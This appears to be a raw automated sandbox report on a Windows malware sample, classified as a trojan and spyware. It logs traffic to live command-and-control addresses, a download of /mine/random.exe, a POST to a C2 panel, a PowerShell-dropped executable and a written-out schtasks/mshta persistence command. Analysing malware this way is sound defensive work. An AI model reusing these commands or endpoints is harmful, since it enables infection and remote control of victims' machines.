                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B1CF1A InternetQueryDataAvailable,InternetReadFile,GetLastError,SetEvent,SetEvent,0_2_00B1CF1A
                  Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                  Source: unknownHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: rapes.exe, 00000016.00000002.2111635363.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/
                  Source: rapes.exe, 00000016.00000002.2111635363.0000000000A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.
                  Source: rapes.exe, 00000016.00000002.2111635363.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000016.00000002.2111635363.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.php
                  Source: rapes.exe, 00000016.00000002.2111635363.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.php0
                  Source: rapes.exe, 00000016.00000002.2111635363.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpO
                  Source: rapes.exe, 00000016.00000002.2111635363.0000000000A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpU
                  Source: rapes.exe, 00000016.00000002.2111635363.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpf
                  Source: rapes.exe, 00000016.00000002.2111635363.0000000000A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpi
                  Source: powershell.exe, 00000005.00000002.906753579.0000000004707000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7
                  Source: powershell.exe, 00000008.00000002.956274416.0000020040AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.955094111.000002003EDD0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.956274416.0000020040D0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/mine/random.exe
                  Source: svchost.exe, 0000000F.00000002.2116528091.000002DDA0E97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.15.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: powershell.exe, 00000005.00000002.915317498.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.998194398.0000020050C93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.998194398.0000020050B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000008.00000002.956274416.0000020040D0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000005.00000002.906753579.00000000045B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.956274416.0000020040AE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000008.00000002.956274416.0000020040D0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000008.00000002.956274416.0000020040AE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000005.00000002.906753579.00000000045B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBNr
                  Source: powershell.exe, 00000008.00000002.998194398.0000020050B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000008.00000002.998194398.0000020050B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000008.00000002.998194398.0000020050B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: edb.log.15.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
                  Source: svchost.exe, 0000000F.00000003.1203271669.000002DDA0CB0000.00000004.00000800.00020000.00000000.sdmp, edb.log.15.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
                  Source: powershell.exe, 00000008.00000002.956274416.0000020040D0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000005.00000002.906753579.0000000004D93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.956274416.0000020041C3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000005.00000002.915317498.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.998194398.0000020050C93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.998194398.0000020050B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B0AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00B0AA57
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B39576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00B39576

                  System Summary

                  barindex
                  Binary is likely a compiled AutoIt script file
                  Source: uw7A6EF76R.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: uw7A6EF76R.exe, 00000000.00000002.870769172.0000000000B62000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e9f04cc6-8
                  Source: uw7A6EF76R.exe, 00000000.00000002.870769172.0000000000B62000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_ed315ede-3
                  Source: uw7A6EF76R.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_19f57564-b
                  Source: uw7A6EF76R.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7b1b3ac8-b
                  Creates HTA files
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeFile created: C:\Users\user\AppData\Local\Temp\OPrA2uVEu.htaJump to behavior
                  PE file contains section with special chars
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.drStatic PE information: section name:
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.drStatic PE information: section name: .idata
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.drStatic PE information: section name:
                  Source: rapes.exe.10.drStatic PE information: section name:
                  Source: rapes.exe.10.drStatic PE information: section name: .idata
                  Source: rapes.exe.10.drStatic PE information: section name:
                  Powershell drops PE file
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B0D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00B0D5EB
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B01201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00B01201
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B0E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00B0E8F6
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEFile created: C:\Windows\Tasks\rapes.jobJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AA80600_2_00AA8060
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B120460_2_00B12046
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B082980_2_00B08298
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00ADE4FF0_2_00ADE4FF
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AD676B0_2_00AD676B
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00ACCAA00_2_00ACCAA0
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AACAF00_2_00AACAF0
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00ABCC390_2_00ABCC39
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AD6DD90_2_00AD6DD9
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00ABD0640_2_00ABD064
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AA91C00_2_00AA91C0
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00ABB1190_2_00ABB119
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AC13940_2_00AC1394
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AC17060_2_00AC1706
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AC781B0_2_00AC781B
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AC19B00_2_00AC19B0
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AA79200_2_00AA7920
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AB997D0_2_00AB997D
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AC7A4A0_2_00AC7A4A
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AC7CA70_2_00AC7CA7
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AC1C770_2_00AC1C77
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AD9EEE0_2_00AD9EEE
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B2BE440_2_00B2BE44
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AC1F320_2_00AC1F32
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 22_2_00EF61F022_2_00EF61F0
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 22_2_00EFB70022_2_00EFB700
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 22_2_00F318D722_2_00F318D7
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 22_2_00F35CD422_2_00F35CD4
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 22_2_00F1B4C022_2_00F1B4C0
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 22_2_00F3404722_2_00F34047
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 22_2_00F22C2022_2_00F22C20
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 22_2_00F35DF422_2_00F35DF4
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 22_2_00EF51A022_2_00EF51A0
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 22_2_00EF4EF022_2_00EF4EF0
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 22_2_00F1F6DB22_2_00F1F6DB
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 22_2_00F2C6DD22_2_00F2C6DD
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: String function: 00AA9CB3 appears 31 times
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: String function: 00AC0A30 appears 41 times
                  Source: uw7A6EF76R.exe, 00000000.00000003.862977854.000000000155E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs uw7A6EF76R.exe
                  Source: uw7A6EF76R.exe, 00000000.00000003.862977854.000000000155E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename16LE vs uw7A6EF76R.exe
                  Source: uw7A6EF76R.exe, 00000000.00000003.868925168.0000000001416000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAMEU vs uw7A6EF76R.exe
                  Source: uw7A6EF76R.exe, 00000000.00000003.869723233.0000000001423000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAMEU vs uw7A6EF76R.exe
                  Source: uw7A6EF76R.exe, 00000000.00000003.870275441.0000000001423000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAMEU vs uw7A6EF76R.exe
                  Source: uw7A6EF76R.exe, 00000000.00000002.871222914.0000000001429000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAMEU vs uw7A6EF76R.exe
                  Source: uw7A6EF76R.exe, 00000000.00000003.870023012.0000000001565000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs uw7A6EF76R.exe
                  Source: uw7A6EF76R.exe, 00000000.00000003.870023012.0000000001565000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename16LE vs uw7A6EF76R.exe
                  Source: uw7A6EF76R.exe, 00000000.00000003.870411949.0000000001425000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAMEU vs uw7A6EF76R.exe
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: uw7A6EF76R.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.drStatic PE information: Section: ZLIB complexity 0.9982244318181818
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.drStatic PE information: Section: pourftpu ZLIB complexity 0.9944845824115044
                  Source: rapes.exe.10.drStatic PE information: Section: ZLIB complexity 0.9982244318181818
                  Source: rapes.exe.10.drStatic PE information: Section: pourftpu ZLIB complexity 0.9944845824115044
                  Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@25/13@0/3
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B137B5 GetLastError,FormatMessageW,0_2_00B137B5
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B010BF AdjustTokenPrivileges,CloseHandle,0_2_00B010BF
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B016C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00B016C3
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B151CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00B151CD
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B2A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00B2A67C
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B1648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00B1648E
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00AA42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00AA42A2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2636:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7024:120:WilError_03
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeFile created: C:\Users\user\AppData\Local\Temp\OPrA2uVEu.htaJump to behavior
                  Source: uw7A6EF76R.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: uw7A6EF76R.exeVirustotal: Detection: 57%
                  Source: uw7A6EF76R.exeReversingLabs: Detection: 47%
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEString found in binary or memory: " /add /y
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEString found in binary or memory: " /add
                  Source: rapes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: rapes.exeString found in binary or memory: " /add
                  Source: rapes.exeString found in binary or memory: " /add /y
                  Source: rapes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: rapes.exeString found in binary or memory: " /add
                  Source: rapes.exeString found in binary or memory: " /add /y
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEString found in binary or memory: " /add /y
                  Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEString found in binary or memory: " /add
                  Source: rapes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: rapes.exeString found in binary or memory: " /add
                  Source: rapes.exeString found in binary or memory: " /add /y
                  Source: unknownProcess created: C:\Users\user\Desktop\uw7A6EF76R.exe "C:\Users\user\Desktop\uw7A6EF76R.exe"
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f
